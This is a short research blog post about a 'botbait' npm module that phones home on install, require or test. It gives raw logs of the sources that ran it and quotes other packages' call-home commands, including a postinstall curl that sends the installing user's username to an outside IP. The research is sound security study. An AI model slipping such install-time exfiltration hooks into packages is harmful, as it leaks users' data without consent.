What Are the Bots Up to on npm?

Last year (2015) I had a thought, “who else is downloading and running / testing random modules on npm.” Postulating that there might be bots, build systems or other researchers mass downloading and running modules from npm. I figured it might be an interesting vector to attack systems and gain a foothold for some org and I was curious to know what that traffic looked like.

Illustration by Amy Lynn Taylor

So I set the bait.

I built a module, called botbait. This module calls home when it’s installed, required, or tested as well as the following.

var payload = {
 process_versions: process.versions,
 process_platform: process.platform,
 process_arch: process.arch,
 type: process.argv[2] || index.js
}

The Results

The results are pretty boring. I thought there would be a lot more random installations / tests to be honest.

Total Downloads — 582

Who took the bait?Who took the bait?

Unique Sources — 7

The sources that stand out as interesting to me are the ones from Berkeley and Microsoft. I hope that somebody there has some interesting research to share.

Raw data.

2015-06-23T21:04:11.995Z, 193.137.5.49, ran npm test
2015-11-25T18:02:53.950Z, 140.78.145.161, npm i
2016-01-29T16:26:03.223Z, 89.251.52.64, npm i 
2016-08-13T18:19:28.746Z, 131.107.160.43, ran or required index.js
2016-08-26T02:56:44.625Z, 103.6.32.2, npm i
2016-09-30T22:34:10.421Z, 192.31.105.138, ran or required index.js
2016-10-08T04:07:01.342Z, 192.31.105.136, ran or required index.js

Who else is watching?

During my late nights spelunking around the npm registry I found a few others that are calling home.

I do not in any way recommend installing these modules. At the time of writing they were not malicious but you never know.

et_phone_home — pings a url

wget -q http://176.31.142.25/javascript_no_way_you_got_here_randomly

anarchy — Reports to google analytics UA-48351156–4

harmlesspackage— reports your username via postinstall hook

curl -X GET http://104.131.21.155:8043/?$(whoami)

… I’m sure there are others that I didn’t notice this time around.

Final thoughts

Something I thought would be fun to dig into really wasn’t. It’s not always a glorious result for research. There isn’t a lot of automated activity that’s just downloading all the modules and doing things. Most of the activity comes from registry replicas mirroring the registry.

Originally posted on Medium